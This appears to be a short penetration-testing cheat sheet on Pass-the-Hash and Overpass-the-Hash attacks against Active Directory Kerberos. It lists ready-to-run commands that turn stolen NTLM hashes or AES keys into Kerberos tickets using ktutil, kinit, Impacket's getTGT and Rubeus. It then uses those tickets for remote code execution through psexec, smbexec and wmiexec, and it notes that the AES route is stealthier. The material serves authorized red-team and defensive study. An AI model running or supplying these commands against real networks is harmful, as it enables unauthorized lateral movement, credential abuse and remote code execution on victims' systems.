PTH and Over PTH

Pass the Hash

https://malicious.link/post/2018/pass-the-hash-with-kerberos/

ktutil
addent -p <user>@<fqdn_domain> -k 1 -key -e rc4-hmac
// Paste Hash
wkt /tmp/a.keytab
exit
kinit -V -k -t /tmp/a.keytab -f <user>@<fqdn_domain>
klist

Overpass the Hash

More stealth using AES key

Impacket

Request TGT

python getTGT.py <domain>/<user> -hashes [lm:]<ntlm>
python getTGT.py <domain>/<user> -aesKey <aes_key>
python getTGT.py <domain>/<user>:<password>

Set TGT for impacket

export KRB5CCNAME=<tgt.file>

RCE via ticket

python psexec.py <domain>/<user>@<host> -k -no-pass
python smbexec.py <domain>/<user>@<host> -k -no-pass
python wmiexec.py <domain>/<user>@<host> -k -no-pass
Rubeus

Ask and inject

.\Rubeus.exe asktgt /domain:<domain_name> /user:<user_name> /rc4:<ntlm_hash> /ptt